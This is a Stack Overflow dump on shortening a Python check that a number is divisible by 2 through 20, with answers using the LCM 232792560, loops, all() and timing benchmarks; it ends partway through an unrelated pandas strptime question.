<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,446 | <p>There's a smarter way to do this. If <code>n</code> is divisible by every integer in range(1, 21) then it <em>must</em> be a multiple of the <a href="https://en.wikipedia.org/wiki/Least_common_multiple">least common multiple</a> of those integers. </p>
<p>You can calculate the LCM of a set of numbers progressively, using the GCD (greatest common divisor). You can import the gcd function from the <code>fractions</code> module, or implement it directly in your code.</p>
<pre><code>def gcd(a, b):
''' Greatest Common Divisor '''
while b:
a, b = b, a % b
return a
def lcm(a, b):
''' Least Common Multiple '''
return a * b // gcd(a, b)
# Compute the LCM of range(1, 21)
n = 2
for i in range(3, 21):
n = lcm(n, i)
lcm20 = n
print('LCM =', lcm20)
#test
for i in range(1, 21):
print(i, lcm20 % i)
</code></pre>
<p><strong>output</strong></p>
<pre><code>LCM = 232792560
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 0
11 0
12 0
13 0
14 0
15 0
16 0
17 0
18 0
19 0
20 0
</code></pre>
<p>Now, to test if any number <code>n</code> is divisible by all the numbers is range(1, 21) you can just do </p>
<pre><code>n % lcm20 == 0
</code></pre>
<p>or hard-code the constant into your script:</p>
<pre><code># 232792560 is the LCM of 1..20
n % 232792560 == 0
</code></pre>
<hr>
<p>As Anton Sherwood points out in <a href="http://stackoverflow.com/questions/38742938/how-to-make-this-block-of-python-code-short-and-efficient/38743446#comment64890813_38743106">his comment</a> we can speed up the process of finding the required LCM by just taking the LCM of the upper half of the range. This works because each number in the lower half of the range is a divisor of a number in the upper half of the range.</p>
<p>We can improve the speed even further by in-lining the GCD and LCM calculations, rather than calling functions to perform those operations. Python function calls are noticeably slower than C function calls due to the extra overheads involved.</p>
<p>Yakk mentions an alternative approach to finding the required LCM: calculate the product of the prime powers in the range. This is quite fast if the range is large enough (around 40 or so), but for small numbers the simple LCM loop is faster.</p>
<p>Below is some <code>timeit</code> code that compares the speed of these various approaches. This script runs on Python 2 and 3, I've tested it on Python 2.6 and Python 3.6. It uses a prime list function by Robert William Hanks to implement Yakk's suggestion. I've modified Robert's code slightly to make it compatible with Python 3. I suppose there may be a more efficient way to find the prime powers; if so, I'd like to see it. :)</p>
<p>I mentioned earlier that there's a GCD function in the <code>fractions</code> module. I did some time tests with it, but it's noticeably slower than my code. Presumably that's because it does error checking on the arguments.</p>
<pre><code>#!/usr/bin/env python3
''' Least Common Multiple of the numbers in range(1, m)
Speed tests
Written by PM 2Ring 2016.08.04
'''
from __future__ import print_function
from timeit import Timer
#from fractions import gcd
def gcd(a, b):
''' Greatest Common Divisor '''
while b:
a, b = b, a % b
return a
def lcm(a, b):
''' Least Common Multiple '''
return a * b // gcd(a, b)
def primes(n):
''' Returns a list of primes < n '''
# By Robert William Hanks, from http://stackoverflow.com/a/3035188/4014959
sieve = [True] * (n//2)
for i in range(3, int(n ** 0.5) + 1, 2):
if sieve[i//2]:
sieve[i*i//2::i] = [False] * ((n - i*i - 1) // (2*i) + 1)
return [2] + [2*i + 1 for i in range(1, n//2) if sieve[i]]
def lcm_range_PM(m):
''' The LCM of range(1, m) '''
n = 1
for i in range(2, m):
n = lcm(n, i)
return n
def lcm_range_AS(m):
''' The LCM of range(1, m) '''
n = m // 2
for i in range(n + 1, m):
n = lcm(n, i)
return n
def lcm_range_fast(m):
''' The LCM of range(1, m) '''
n = m // 2
for i in range(n + 1, m):
a, b = n, i
while b:
a, b = b, a % b
n = n * i // a
return n
def lcm_range_primes(m):
n = 1
for p in primes(m):
a = p
while a < m:
a *= p
n *= a // p
return n
funcs = (
lcm_range_PM,
lcm_range_AS,
lcm_range_fast,
lcm_range_primes
)
def verify(hi):
''' Verify that all the functions give the same result '''
for i in range(2, hi + 1):
a = [func(i) for func in funcs]
a0 = a[0]
assert all(u == a0 for u in a[1:]), (i, a)
print('ok')
def time_test(loops, reps):
''' Print timing stats for all the functions '''
timings = []
for func in funcs:
fname = func.__name__
setup = 'from __main__ import num, ' + fname
cmd = fname + '(num)'
t = Timer(cmd, setup)
result = t.repeat(reps, loops)
result.sort()
timings.append((result, fname))
timings.sort()
for result, fname in timings:
print('{0:16} {1}'.format(fname, result))
verify(500)
reps = 3
loops = 8192
num = 2
for _ in range(10):
print('\nnum = {0}, loops = {1}'.format(num, loops))
time_test(loops, reps)
num *= 2
loops //= 2
print('\n' + '- ' * 40)
funcs = (
lcm_range_fast,
lcm_range_primes
)
loops = 1000
for num in range(30, 60):
print('\nnum = {0}, loops = {1}'.format(num, loops))
time_test(loops, reps)
</code></pre>
<p><strong>output</strong></p>
<pre><code>ok
num = 2, loops = 8192
lcm_range_PM [0.013914467999711633, 0.01393848999941838, 0.023966414999449626]
lcm_range_fast [0.01656803699916054, 0.016577592001340236, 0.016578077998929075]
lcm_range_AS [0.01738608899904648, 0.017602848000024096, 0.01770572900022671]
lcm_range_primes [0.0979132459997345, 0.09863009199943917, 0.10133290699923236]
num = 4, loops = 4096
lcm_range_fast [0.01580070299860381, 0.01581421999981103, 0.016406731001552544]
lcm_range_AS [0.020135083001150633, 0.021132826999746612, 0.021589830999801052]
lcm_range_PM [0.02821666900126729, 0.029041511999821523, 0.036708851001094445]
lcm_range_primes [0.06287289499960025, 0.06381634699937422, 0.06406087200048205]
num = 8, loops = 2048
lcm_range_fast [0.015360695999333984, 0.02138442599971313, 0.02630166100061615]
lcm_range_AS [0.02104746699842508, 0.021742354998423252, 0.022648989999652258]
lcm_range_PM [0.03499621999981173, 0.03546843599906424, 0.042924503999529406]
lcm_range_primes [0.03741390599861916, 0.03865244000007806, 0.03959638999913295]
num = 16, loops = 1024
lcm_range_fast [0.015973221999956877, 0.01600381199932599, 0.01603960700049356]
lcm_range_AS [0.023003745000096387, 0.023848425998949097, 0.024875303000953863]
lcm_range_primes [0.028887982000014745, 0.029422679001072538, 0.029940758000520873]
lcm_range_PM [0.03780223299872887, 0.03925949299991771, 0.04462484900068375]
num = 32, loops = 512
lcm_range_fast [0.018606906000059098, 0.02557359899947187, 0.03725786200084258]
lcm_range_primes [0.021675119000065024, 0.022790905999499955, 0.03934840099827852]
lcm_range_AS [0.025330593998660333, 0.02545427500081132, 0.026093265998497372]
lcm_range_PM [0.044320442000753246, 0.044836185001258855, 0.05193238799984101]
num = 64, loops = 256
lcm_range_primes [0.01650579099987226, 0.02443148000020301, 0.033489004999864846]
lcm_range_fast [0.018367127000601613, 0.019002625000211992, 0.01955779200034158]
lcm_range_AS [0.026258470001266687, 0.04113643799973943, 0.0436801750001905]
lcm_range_PM [0.04854909000096086, 0.054864030998942326, 0.0797669980001956]
num = 128, loops = 128
lcm_range_primes [0.013294352000229992, 0.013383581999732996, 0.024317635999977938]
lcm_range_fast [0.02098568399924261, 0.02108044199849246, 0.03272008299973095]
lcm_range_AS [0.028861763999884715, 0.0399744570004259, 0.04660961700028565]
lcm_range_PM [0.05302166500041494, 0.059346372001527925, 0.07757829000001948]
num = 256, loops = 64
lcm_range_primes [0.010487794999789912, 0.010514846000660327, 0.01055656300013652]
lcm_range_fast [0.02619308099929185, 0.02637610199963092, 0.03755473099954543]
lcm_range_AS [0.03422451699952944, 0.03513622399987071, 0.05206341099983547]
lcm_range_PM [0.06851765200008231, 0.073690847000762, 0.07841700100107118]
num = 512, loops = 32
lcm_range_primes [0.009275872000216623, 0.009292663999076467, 0.009309271999882185]
lcm_range_fast [0.03759837500001595, 0.03774761099884927, 0.0383951439998782]
lcm_range_AS [0.04527828100071929, 0.046646228000099654, 0.0569303670017689]
lcm_range_PM [0.11064135100059502, 0.12738902800083451, 0.13843623499997193]
num = 1024, loops = 16
lcm_range_primes [0.009248070000467123, 0.00931658900117327, 0.010279963000357384]
lcm_range_fast [0.05642254200029129, 0.05663530499987246, 0.05796714499956579]
lcm_range_AS [0.06509247900066839, 0.0652738099997805, 0.0658949799999391]
lcm_range_PM [0.11376448099872505, 0.11652833600055601, 0.12083648199950403]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
num = 30, loops = 1000
lcm_range_fast [0.03275446999941778, 0.033530079999763984, 0.04002811799909978]
lcm_range_primes [0.04062690899991139, 0.040886697999667376, 0.04130547800014028]
num = 31, loops = 1000
lcm_range_fast [0.03423191600086284, 0.039976395999474335, 0.04078094900069118]
lcm_range_primes [0.04053011599899037, 0.04140578700025799, 0.04566663300101936]
num = 32, loops = 1000
lcm_range_fast [0.036124262000157614, 0.036700047998238006, 0.04392546200142533]
lcm_range_primes [0.042666604998885305, 0.04393434200028423, 0.05142524700022477]
num = 33, loops = 1000
lcm_range_fast [0.03875456000059785, 0.03997290300139866, 0.044469664000644116]
lcm_range_primes [0.04280027899949346, 0.0437891679994209, 0.04381238600035431]
num = 34, loops = 1000
lcm_range_fast [0.038203157999305404, 0.03937257799952931, 0.04531203700025799]
lcm_range_primes [0.043273317998682614, 0.043349457999283914, 0.04420187600044301]
num = 35, loops = 1000
lcm_range_fast [0.04228670399970724, 0.04346491300020716, 0.047442203998798504]
lcm_range_primes [0.04332462999991549, 0.0433610400014004, 0.04525857199951133]
num = 36, loops = 1000
lcm_range_fast [0.04175829099949624, 0.04217126499861479, 0.046840714998324984]
lcm_range_primes [0.04339772299863398, 0.04360795700085873, 0.04453475599984813]
num = 37, loops = 1000
lcm_range_fast [0.04231068799890636, 0.04373836499871686, 0.05010528200000408]
lcm_range_primes [0.04371378700125206, 0.04463105400100176, 0.04481986299833807]
num = 38, loops = 1000
lcm_range_fast [0.042841554000915494, 0.043649038998410106, 0.04868016199907288]
lcm_range_primes [0.04571479200058093, 0.04654245399979118, 0.04671720700025617]
num = 39, loops = 1000
lcm_range_fast [0.04469198100014182, 0.04786454099848925, 0.05639159299971652]
lcm_range_primes [0.04572433999965142, 0.04583652600013011, 0.046649005000290344]
num = 40, loops = 1000
lcm_range_fast [0.044788433999201516, 0.046223339000789565, 0.05302252199908253]
lcm_range_primes [0.045482261000870494, 0.04680115900009696, 0.046941823999077315]
num = 41, loops = 1000
lcm_range_fast [0.04650144500010356, 0.04783133000091766, 0.05405569400136301]
lcm_range_primes [0.04678159699869866, 0.046870936999766855, 0.04726529199979268]
num = 42, loops = 1000
lcm_range_fast [0.04772527699969942, 0.04824955299955036, 0.05483534199993301]
lcm_range_primes [0.0478546140002436, 0.048954233001495595, 0.04905354400034412]
num = 43, loops = 1000
lcm_range_primes [0.047872637000182294, 0.048093739000250935, 0.048502418998396024]
lcm_range_fast [0.04906317900167778, 0.05292572700091114, 0.09274570399975346]
num = 44, loops = 1000
lcm_range_primes [0.049750300000596326, 0.050272532000235515, 0.05087747600009607]
lcm_range_fast [0.050906279000628274, 0.05109869400075695, 0.05820328499976313]
num = 45, loops = 1000
lcm_range_primes [0.050158660000306554, 0.050309066000409075, 0.054478109999763547]
lcm_range_fast [0.05236714599959669, 0.0539534259987704, 0.058996140000090236]
num = 46, loops = 1000
lcm_range_primes [0.049894845999006066, 0.0512076260001777, 0.051318084999365965]
lcm_range_fast [0.05081920200063905, 0.051397655999608105, 0.05722950699964713]
num = 47, loops = 1000
lcm_range_primes [0.04971165599999949, 0.05024208400027419, 0.051092388999677496]
lcm_range_fast [0.05388393700013694, 0.05502788499870803, 0.05994341699988581]
num = 48, loops = 1000
lcm_range_primes [0.0517014939996443, 0.05279760400117084, 0.052917389999493025]
lcm_range_fast [0.05402479099939228, 0.055251746000067214, 0.06128628700025729]
num = 49, loops = 1000
lcm_range_primes [0.05412415899991174, 0.05474224499994307, 0.05610057699959725]
lcm_range_fast [0.05757830900074623, 0.0590323519991216, 0.06310263200066402]
num = 50, loops = 1000
lcm_range_primes [0.054892387001018506, 0.05504404100065585, 0.05610281799999939]
lcm_range_fast [0.0588886920013465, 0.0594741389995761, 0.06682244199873821]
num = 51, loops = 1000
lcm_range_primes [0.05582956999933231, 0.055921465000210446, 0.06004790299994056]
lcm_range_fast [0.060586288000195054, 0.061715600999377784, 0.06733965300009004]
num = 52, loops = 1000
lcm_range_primes [0.0557458109997242, 0.05669860099988, 0.056761407999147195]
lcm_range_fast [0.060323355999571504, 0.06177857100010442, 0.06778404599936039]
num = 53, loops = 1000
lcm_range_primes [0.05501838899908762, 0.05541463699955784, 0.0561610999993718]
lcm_range_fast [0.06281833000139159, 0.06334177999997337, 0.06843207200108736]
num = 54, loops = 1000
lcm_range_primes [0.057314272000439814, 0.059501444000488846, 0.060004871998899034]
lcm_range_fast [0.06634221600143064, 0.06662889200015343, 0.07153233899953193]
num = 55, loops = 1000
lcm_range_primes [0.05790564500057371, 0.05824322199987364, 0.05863306900027965]
lcm_range_fast [0.06693624800027465, 0.06784769100158883, 0.07562533499913116]
num = 56, loops = 1000
lcm_range_primes [0.057219010001063, 0.05858367799919506, 0.06246676000046136]
lcm_range_fast [0.06854197999928147, 0.06999059400004626, 0.07505119899906276]
num = 57, loops = 1000
lcm_range_primes [0.05746709300001385, 0.0587476679993415, 0.0606189070003893]
lcm_range_fast [0.07094627400147147, 0.07241532700027165, 0.07868066799892404]
num = 58, loops = 1000
lcm_range_primes [0.0576490580006066, 0.058481812999161775, 0.05857339500107628]
lcm_range_fast [0.07127979200049595, 0.07549924399972952, 0.07849203499972646]
num = 59, loops = 1000
lcm_range_primes [0.057503377998727956, 0.058632499998566345, 0.060360438999850885]
lcm_range_fast [0.07332589399993594, 0.07625177999943844, 0.08087236799838138]
</code></pre>
<p>This timing info was generated using Python 3.6 running on a Debian derivative of Linux, on an ancient 2GHz Pentium IV machine.</p>
| 53 | 2016-08-03T12:17:35Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,465 | <p>It's just a mathematical trick,
use something like <code>n % "LCM(1,2,...,20) == 0</code> which could be coded as:</p>
<pre><code>if n % 232792560 == 0:
#do whatever you want
</code></pre>
| 4 | 2016-08-03T12:18:35Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,751,082 | <p>For variety, the way you could have used a loop for this is</p>
<pre><code>test = True
for modulus in range(2, 21):
if n % modulus != 0:
test = False
break
if test:
# Do stuff
</code></pre>
<p>If you are comfortable with <code>for</code>-<code>else</code>, you can improve the brevity by</p>
<pre><code>for modulus in range(2, 21):
if n % modulus != 0:
break
else:
# Do stuff
</code></pre>
<p>although that pattern may be unusual enough that you wouldn't want to use it.</p>
<p>Another option is to write a helper function</p>
<pre><code>def is_divisible_by_integers_up_to(n, bound):
for modulus in range(2, bound + 1):
if n % modulus != 0:
return False
return True
if is_divisible_by_integers_up_to(n, 20):
# Do stuff
</code></pre>
<p>However, this particular example is simple enough that doing <code>all</code> with a generator expression as described in the other answers is the best way to go.</p>
| 4 | 2016-08-03T18:26:05Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,751,170 | <p>I'm a very light python user myself, and I didn't know about all. Those solutions are pretty cool (and probably more efficient than the one I'm about to post). But just if you want to see another way to do it, here is another option:</p>
<pre><code>def IsDivUpTo20(n):
for i in range(2, 21):
if n % i != 0:
return False
return True
</code></pre>
<p>And call it like so</p>
<pre><code>if IsDivUpTo20(50):
#what to do if it is divisible
else:
#what to do if it isn't
#for the example of 50, it'll be false and jump to the else part, but you can put any number of variable in there
</code></pre>
<p>Functionally it is working pretty much the same way 'all' is, but if you aren't used to the fancy syntax and built-ins this one is a bit more intuitive.</p>
<p>*Note: I use Python 3, not Python 2.7 as the question is tagged. I'm pretty sure this works in that version but if not, someone please correct me.</p>
| 2 | 2016-08-03T18:31:15Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,753,310 | <p>Similar to previous answers:</p>
<pre><code>import operator
x = 232792560
if reduce(operator.__and__, [x % n == 0 for n in xrange(2, 21, 2)]):
print("ok")
</code></pre>
| 2 | 2016-08-03T20:46:25Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,759,211 | <p>Many of the above code examples are shorter, but (probably) not efficient enough:</p>
<pre><code>n%2 == 0 =>
n%4 6 8... ==0
n%3 == 0 =>
n%3 6 9... ==0
</code></pre>
<p>We can use only primes to check within the range:</p>
<pre><code>if all(n % i == 0 for i in [2,3,5,7,11,13,17,19])
</code></pre>
<p>Furthermore, if n divides all from 2 to 20, it divides the LCM of 2 to 20.</p>
| 3 | 2016-08-04T05:38:12Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,813,932 | <p>I don't know if answering your own question is good or not.</p>
<p>Since I need to check. if a number is divisible by numbers from 1 to 20 or not. So it gonna take long time to check. But if I could make checklist shorter then it will efficient.</p>
<p>Like, if a number is divisible by <code>18</code> then it also should be divisible by <code>2</code>   <code>3</code>   <code>6</code> and  <code>9</code>. So based on this I made my checklist:</p>
<pre><code>if all(n % i == 0 for i in [7,11,13,16,17,18,19,20]):
# some code
</code></pre>
<p>And for <code>14</code> Â Â Â <code>15</code> and <code>12</code> think like that.</p>
<p><code>14</code> : If a number is divisible by both <code>2</code> and <code>7</code> it must be divisible by <code>14</code>. </p>
<p><code>15</code>: So in the case of <code>15</code> that if a number is divisible by <code>20</code> so it also should be divisible by <code>5</code> and if a number is divisible by <code>18</code> so it also should be divisible by <code>3</code> and if a number is divisible by both <code>3</code> and <code>5</code> then it must be divisible by <code>15</code>. </p>
<p>This is more efficient than checking all number and it also ensures that the number is divisible by all number between 1 and 20.</p>
| 0 | 2016-08-07T12:01:42Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
Python async transactions psycopg2 | 38,742,954 | <p>It is possible to do async i/o with psycopg2 (which can be <a href="http://initd.org/psycopg/docs/advanced.html#async-support" rel="nofollow">read here</a>) however I'm not sure how to do async transactions. Consider this sequence of things:</p>
<ul>
<li>Green Thread 1 starts transaction T</li>
<li>GT1 issues update</li>
<li>GT2 issues one transactional update</li>
<li>GT1 issues update</li>
<li>GT1 commits transaction T</li>
</ul>
<p>I assume that GT1 updates conflict with GT2 updates.</p>
<p>Now according to <a href="http://initd.org/psycopg/docs/cursor.html?highlight=cursor#cursor" rel="nofollow">docs</a>:</p>
<blockquote>
<p>Cursors created from the same connection are not isolated, i.e., any
changes done to the database by a cursor are immediately visible by
the other cursors.</p>
</blockquote>
<p>so we can't implement the flow above on cursors. We could implement it on different connections but since we are doing async then spawning (potentially) thousands db connections might be bad (not to mention that Postgres can't handle so much out-of-the-box).</p>
<p>The other option is to have a pool of connections and reuse them. But then if we issue X parallel transactions all other green threads are blocked until some connection is available. Thus the actual amount of useful green threads is ~X (assuming the app is heavily db bound) which raises question: why would we use async to begin with?</p>
<p>Now this question can actually be generalized to DB API 2.0. Maybe the real answer is that DB API 2.0 is not suited for async programming? How would we do async io on Postgresql then? Maybe some other library?</p>
<p>Or maybe is that because the postgresql protocol is actually synchronous? It would be perfect to be able to "write" to any transaction at any time (per connection). Postgresql would have to expose transaction's id for that. Is it doable? Maybe two-phase commit is the answer?</p>
<p>Or am I missing something here?</p>
<p><strong>EDIT:</strong> This seems to be a general problem with SQL since <code>BEGIN; COMMIT;</code> semantics just can't be used asynchronously efficiently.</p>
| 2 | 2016-08-03T11:56:49Z | 38,744,541 | <p>Actually you can use BEGIN; and COMMIT; with async. What you need is a connection pool setup and make sure each green thread gets its own connection (Just like a real thread would in a multithreaded application).</p>
<p>You cannot use psycopg2's builtin transaction handling.</p>
| 0 | 2016-08-03T13:05:06Z | [
"python",
"postgresql",
"asynchronous",
"psycopg2",
"python-db-api"
] |
python imap4 extract subject mails | 38,743,027 | <p>i have this python code :</p>
<pre><code>import imaplib
import email, sys
imaplib._MAXLINE = 40000
mail = imaplib.IMAP4('imapmail.libero.it')
mail.login('username@libero.it', 'password')
mail.list()
mail.select('inbox')
result, data = mail.search(None, 'All')
out = open('output.txt', 'a', 0)
for latest_email_uid in data[0].split():
try:
result, data = mail.uid('fetch', latest_email_uid, '(RFC822)')
raw_email = data[0][1]
email_message = email.message_from_string(raw_email)
tmp = email_message['Subject']
tmp = tmp.strip().replace('\r','').replace('\n','')+'\n'
sys.stdout.write("\r"+tmp)
out.write(tmp.strip() + '\n')
except Exception as e:
print e
mail.close()
out.close()
</code></pre>
<p>the code return this error :</p>
<pre><code>'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
"Samsung MZ-7KE1T0BW SSD 850 PRO..."
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
Promozione finestre termiche in pvc Gruppo Re
Il Giubileo di Papa Francesco
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
</code></pre>
<p>i need extract all subjects from inbox and write in text file. in another email service my code works without problem. how i can resolve this problem ? Where is the problem ?</p>
| 1 | 2016-08-03T12:00:01Z | 38,744,582 | <p>When you do...</p>
<pre><code>result, data = mail.search(None, 'All')
</code></pre>
<p>...<code>data</code> holds <code>message sequence numbers</code>, not <code>uids</code>. Message sequence numbers and UIDs are not the same. </p>
<p>So, to fix your code, replace the above line with:</p>
<pre><code>result, data = mail.uid('search', None, 'All')
</code></pre>
<blockquote>
<p>An UID is a unique identifier that will not change over time while a
message sequence number may change whenever the content of the mailbox
changes.</p>
</blockquote>
<p>You can read more about the attributes <a href="https://tools.ietf.org/html/rfc3501#section-2.3.1.1" rel="nofollow">UID</a> and <a href="https://tools.ietf.org/html/rfc3501#section-2.3.1.2" rel="nofollow">Message Sequence Numbers</a> here: <a href="https://tools.ietf.org/html/rfc3501" rel="nofollow">https://tools.ietf.org/html/rfc3501</a></p>
| 0 | 2016-08-03T13:07:40Z | [
"python"
] |
Pandas Converter on Data strptime() | 38,743,079 | <p>I am trying to plot this points, however I am getting that error. Do I need another converter for the date data? The x-axis should be the date, and y axis should be the time value. Thank you.</p>
<p>TypeError: strptime() argument 1 must be str, not Timestamp</p>
<pre><code>df = pd.read_csv('file.csv', sep=',', parse_dates=[0], header=None,
names=['Date', 'Time'])
print (df.head())
Date Time
0 2015-01-02 02:29:45 PM
1 2015-01-02 05:16:15 PM
2 2015-01-02 05:48:46 PM
3 2015-01-02 03:18:34 PM
4 2015-01-02 05:22:55 PM
In [5]:
date = df['Date']
time = df['Time']
from matplotlib import pyplot as plt
from matplotlib.dates import date2num
â
â
def date_to_days(date):
return date2num(datetime.datetime.strptime(date,'%Y-%m-%d'))
â
â
def time_to_hours(time):
[hh, mm, ss] = [int(x) for x in time.split(':')]
seconds = datetime.timedelta(hours=hh, minutes=mm, seconds=ss).seconds
hours = seconds / float(3600)
return hours
â
if __name__ == '__main__':
start_date = '2015-01-01'
